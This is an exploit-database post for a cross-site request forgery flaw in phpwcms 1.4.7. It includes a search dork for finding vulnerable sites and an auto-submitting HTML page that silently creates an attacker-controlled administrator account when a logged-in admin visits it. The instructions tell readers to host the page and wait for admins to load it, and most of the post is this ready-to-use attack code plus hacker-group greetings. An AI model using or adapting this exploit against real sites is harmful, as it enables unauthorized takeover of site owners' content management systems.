phpwcms 1.4.7 Cross Site Request Forgery
Posted on 28 April 2011
#(+) Exploit Title: phpwcms v1.4.7 XSRF Vulnerability(Add Admin User) #(+) Author : ^Xecuti0n3r #(+) E-mail : xecuti0n3r()yahoo.com #(+) Category : Web Apps [XSRF] #(+) Dork : intext:"phpwcms Copyright" #(+) Download Link : http://phpwcms.googlecode.com/files/phpwcms_r412.zip #(+) PHPCMS Official website : http://www.phpwcms.de/ 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm ^Xecuti0n3r member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 #All you have to do is save the below code as exploit.html #Then Host a website with the exploit.html file. A person with admin permissions if visits the site, # will automatically add the attacker as Admin without warning ;) ____________________________________________________________________ ____________________________________________________________________ Code: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>phpwcms v1.4.7 XSRF Vulnerability(Add Admin User)</title> </head> <body onload="javascript:fireForms()"> <script language="JavaScript"> function fireForms() { var count = 2; var i=0; for(i=0; i<count; i++) { document.forms[i].submit(); } } </script> <H2>phpwcms v1.4.7 XSRF Vulnerability(Add Admin User)</H2> <form method="POST" name="form0" action="http://localhost:80/phpwcms.php?do=admin&s=1"> <input type="hidden" name="form_newloginname" value="admin2"/> <input type="hidden" name="form_newpassword" value="admin2pass"/> <input type="hidden" name="form_newemail" value="fakeadmin2@admin.com"/> <input type="hidden" name="form_newrealname" value="fakeadmin2"/> <input type="hidden" name="form_feuser" value="2"/> <input type="hidden" name="form_active" value="1"/> <input type="hidden" name="form_admin" value="1"/> <input type="hidden" name="form_aktion" value="create_account"/> <input type="hidden" name="Submit" value="send user data"/> </form> </body> </html> ######################################################################## (+)Exploit Coded by: ^Xecuti0N3r (+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r (+)Gr33ts to : Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) + All the 31337 Members :) (+)<3 to :Indian Cyber Army & Indishell Crew ########################################################################